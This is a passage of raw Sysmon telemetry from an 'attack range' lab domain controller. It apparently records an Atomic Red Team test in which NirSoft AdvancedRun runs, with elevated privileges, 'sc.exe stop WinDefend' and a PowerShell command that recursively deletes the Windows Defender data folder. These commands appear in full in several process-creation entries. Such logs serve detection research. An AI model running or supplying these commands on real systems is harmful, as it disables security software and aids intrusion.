WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967138Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.191{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967137Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.191{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 734700x80000000000000003967136Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.191{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003967135Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.191{834264DD-DAF8-61EA-5B00-000000002702}41004280C:\Windows\system32\csrss.exe{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000003967134Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.191{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003967133Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.175{834264DD-F281-61EA-1E04-000000002702}10281352C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11ATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000003967132Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.189{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /WindowState 0 /CommandLine "rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse" /StartDirectory /RunAs 8 /RunC:\Users\Administrator\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-F281-61EA-1E04-000000002702}1028C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe /EXEFilename \""C:\Windows\System32\sc.exe\"" /WindowState 0 /CommandLine \""stop WinDefend\"" /StartDirectory \""\"" /RunAs 8 /Run C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe \""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe\"" /WindowState 0 /CommandLine \""rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse\"" /StartDirectory \""\"" /RunAs 8 /Run} ATTACKRANGE\Administrator 734700x80000000000000003967131Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.175{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967130Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.175{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967129Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.175{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967128Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.175{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967127Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.175{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967126Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.175{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967125Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.175{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967124Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.175{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967123Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.175{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967122Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.175{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 10341000x80000000000000003967121Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.175{834264DD-DAF8-61EA-5B00-000000002702}41004116C:\Windows\system32\csrss.exe{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003967120Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.175{834264DD-F281-61EA-1E04-000000002702}10281352C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11ATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000003967119Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.176{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe" /EXEFilename C:\Windows\System32\sc.exe /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory /RunAs 8 /RunC:\Users\Administrator\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-F281-61EA-1E04-000000002702}1028C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe /EXEFilename \""C:\Windows\System32\sc.exe\"" /WindowState 0 /CommandLine \""stop WinDefend\"" /StartDirectory \""\"" /RunAs 8 /Run C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe \""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe\"" /WindowState 0 /CommandLine \""rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse\"" /StartDirectory \""\"" /RunAs 8 /Run} ATTACKRANGE\Administrator 154100x80000000000000003966866Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:57.927{834264DD-F281-61EA-1E04-000000002702}1028C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe /EXEFilename \""C:\Windows\System32\sc.exe\"" /WindowState 0 /CommandLine \""stop WinDefend\"" /StartDirectory \""\"" /RunAs 8 /Run C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe \""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe\"" /WindowState 0 /CommandLine \""rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse\"" /StartDirectory \""\"" /RunAs 8 /Run} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 534500x80000000000000003955716Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:32:19.984{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeATTACKRANGE\Administrator 10341000x80000000000000003955241Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:46.979{834264DD-DB11-61EA-9500-000000002702}4285540C:\Windows\Explorer.EXE{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003955240Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:46.979{834264DD-DB11-61EA-9500-000000002702}4285540C:\Windows\Explorer.EXE{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003955239Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:46.979{834264DD-DB11-61EA-9500-000000002702}4285540C:\Windows\Explorer.EXE{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003955238Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:46.964{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62db0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003955237Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:46.964{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+62d6c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003955236Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:46.964{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62d40|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003955235Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:46.964{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003955179Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 